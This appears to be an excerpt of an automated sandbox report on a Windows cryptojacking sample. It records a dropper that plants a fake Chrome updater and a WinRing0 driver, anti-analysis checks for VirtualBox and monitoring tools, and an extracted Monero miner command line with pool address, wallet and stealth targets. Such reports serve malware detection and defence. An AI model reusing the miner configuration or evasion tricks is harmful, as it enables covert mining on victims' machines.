Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\System32\wusa.exeSection loaded: dpx.dllJump to behavior
                Source: C:\Windows\System32\wusa.exeSection loaded: wtsapi32.dllJump to behavior
                Source: C:\Windows\System32\wusa.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\wusa.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\wusa.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
                Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
                Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
                Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
                Source: C:\ProgramData\Google\Chrome\updater.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\System32\wusa.exeSection loaded: dpx.dllJump to behavior
                Source: C:\Windows\System32\wusa.exeSection loaded: wtsapi32.dllJump to behavior
                Source: C:\Windows\System32\wusa.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\wusa.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
                Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
                Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
                Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: umpdc.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: napinsp.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wshbth.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: winrnr.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: licensemanagersvc.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: licensemanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: clipc.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                Source: TwrhjEKqxk.exe | Static PE information: Image base 0x140000000 > 0x60000000
                Source: TwrhjEKqxk.exe | Static file information: File size 8538008 > 1048576
                Source: TwrhjEKqxk.exe | Static PE information: Raw size of (section with non-printable name) is bigger than: 0x100000 < 0x51a52e
                Source: TwrhjEKqxk.exe | Static PE information: Raw size of .boot is bigger than: 0x100000 < 0x2fbe00
                Source: TwrhjEKqxk.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                Source: Binary string: c:\miniprojects\x86il\il86\x64\release\IL86.pdb! source: TwrhjEKqxk.exe, 00000000.00000002.2150017772.00007FF7A0107000.00000040.00000001.01000000.00000003.sdmp, updater.exe, 00000022.00000002.2192775271.00007FF7DA2D7000.00000040.00000001.01000000.00000004.sdmp
                Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: updater.exe, 00000022.00000003.2186145192.000002166E710000.00000004.00000001.00020000.00000000.sdmp, mnidgyzvuran.sys.34.dr
                Source: Binary string: c:\miniprojects\x86il\il86\x64\release\IL86.pdb source: TwrhjEKqxk.exe, 00000000.00000002.2150017772.00007FF7A0107000.00000040.00000001.01000000.00000003.sdmp, updater.exe, 00000022.00000002.2192775271.00007FF7DA2D7000.00000040.00000001.01000000.00000004.sdmp
                Source: initial sample | Static PE information: section where entry point is pointing to: .boot
                Source: TwrhjEKqxk.exe | Static PE information: section name: (non-printable; reported for 8 sections)
                Source: TwrhjEKqxk.exe | Static PE information: section name: .imports
                Source: TwrhjEKqxk.exe | Static PE information: section name: .themida
                Source: TwrhjEKqxk.exe | Static PE information: section name: .boot
                Source: updater.exe.0.dr | Static PE information: section name: (non-printable; reported for 8 sections)
                Source: updater.exe.0.dr | Static PE information: section name: .imports
                Source: updater.exe.0.dr | Static PE information: section name: .themida
                Source: updater.exe.0.dr | Static PE information: section name: .boot
                Source: C:\Windows\System32\conhost.exe | Code function: 57_2_0000000140001394 push qword ptr [0000000140009004h]; ret 57_2_0000000140001403
                Source: TwrhjEKqxk.exe | Static PE information: section name: (non-printable), entropy: 7.964649025796498
                Source: updater.exe.0.dr | Static PE information: section name: (non-printable), entropy: 7.964649025796498

                Persistence and Installation Behavior

                Source: C:\ProgramData\Google\Chrome\updater.exe | File created: C:\Windows\TEMP\mnidgyzvuran.sys
                Source: C:\Users\user\Desktop\TwrhjEKqxk.exe | File created: C:\ProgramData\Google\Chrome\updater.exe (dropped file)
                Source: C:\ProgramData\Google\Chrome\updater.exe | File created: C:\Windows\Temp\mnidgyzvuran.sys (dropped file)

                Boot Survival

                Source: C:\Users\user\Desktop\TwrhjEKqxk.exe | Window searched: window name: RegmonClass
                Source: C:\Users\user\Desktop\TwrhjEKqxk.exe | Window searched: window name: FilemonClass
                Source: C:\Users\user\Desktop\TwrhjEKqxk.exe | Window searched: window name: PROCMON_WINDOW_CLASS
                Source: C:\Users\user\Desktop\TwrhjEKqxk.exe | Window searched: window name: Regmonclass
                Source: C:\Users\user\Desktop\TwrhjEKqxk.exe | Window searched: window name: Filemonclass
                Source: C:\ProgramData\Google\Chrome\updater.exe | Window searched: window name: RegmonClass
                Source: C:\ProgramData\Google\Chrome\updater.exe | Window searched: window name: FilemonClass
                Source: C:\ProgramData\Google\Chrome\updater.exe | Window searched: window name: PROCMON_WINDOW_CLASS
                Source: C:\Users\user\Desktop\TwrhjEKqxk.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc

                Hooking and other Techniques for Hiding and Protection

                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\explorer.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: C:\Users\user\Desktop\TwrhjEKqxk.exe System information queried: FirmwareTableInformation
                Source: C:\ProgramData\Google\Chrome\updater.exe System information queried: FirmwareTableInformation
                Source: C:\Windows\explorer.exe System information queried: FirmwareTableInformation
                Source: C:\Users\user\Desktop\TwrhjEKqxk.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                Source: C:\ProgramData\Google\Chrome\updater.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                Source: explorer.exe, 0000003B.00000003.3450981482.0000000001198000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000003B.00000002.4508056001.0000000001198000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: PROCESSHACKER.EXE
                Source: explorer.exe, 0000003B.00000002.4508056001.0000000001198000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: PROCESSHACKER.EXEKYYGH.EXEEC
                Source: explorer.exe, 0000003B.00000002.4507448971.00000000010E4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: --CINIT-STEALTH-TARGETS=TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE
                Source: explorer.exe, 0000003B.00000003.3450981482.0000000001198000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: PROCESSHACKER.EXEXEEXEE
                Source: explorer.exe, 0000003B.00000002.4508280738.0000000001BA0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXEOCESSORZ
                Source: explorer.exe, 0000003B.00000002.4508056001.0000000001198000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: PROCESSHACKER.EXEKYYGH.EXEEP
                Source: explorer.exe, 0000003B.00000002.4507448971.00000000010E4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: --ALGO=RX/0 --URL=XMR-EU1.NANOPOOL.ORG:10343 --USER="44GJCAUWCV8HFKRNB7Q7UA2U5TT3HW131YDDDSCRVK436U7OGLYIGYN98ZMJURRZ4VWRSZV8UIPSUN9JPELPFC2CBNTZXJE.RIG3{COMPUTERNAME}/A@A.RU" --PASS="" --CPU-MAX-THREADS-HINT=100 --CINIT-WINRING="MNIDGYZVURAN.SYS" --RANDOMX-NO-RDMSR --CINIT-STEALTH-TARGETS="TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE" --CINIT-VERSION="3.4.1" --TLS --CINIT-ID="IRGETNFCWNLZCJJX"
                Source: explorer.exe, 0000003B.00000003.3450981482.0000000001198000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000003B.00000002.4508056001.0000000001198000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: PROCESSHACKER.EXE;C:\WINDOWS
                Source: explorer.exe, 0000003B.00000002.4508280738.0000000001BA0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000003B.00000003.2189432512.00000000010FF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000003B.00000002.4507448971.00000000010E4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE
                Source: explorer.exe, 0000003B.00000003.2189432512.00000000010FF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXEIRGETNFCWNLZCJJX
                Source: explorer.exe, 0000003B.00000002.4507448971.00000000010E4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: EXPLORER.EXE--ALGO=RX/0--URL=XMR-EU1.NANOPOOL.ORG:10343--USER=44GJCAUWCV8HFKRNB7Q7UA2U5TT3HW131YDDDSCRVK436U7OGLYIGYN98ZMJURRZ4VWRSZV8UIPSUN9JPELPFC2CBNTZXJE.RIG3{COMPUTERNAME}/A@A.RU--PASS=--CPU-MAX-THREADS-HINT=100--CINIT-WINRING=MNIDGYZVURAN.SYS--RANDOMX-NO-RDMSR--CINIT-STEALTH-TARGETS=TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE--CINIT-VERSION=3.4.1--TLS--CINIT-ID=IRGETNFCWNLZCJJX
                Source: C:\ProgramData\Google\Chrome\updater.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                Source: C:\ProgramData\Google\Chrome\updater.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                Source: C:\ProgramData\Google\Chrome\updater.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6033
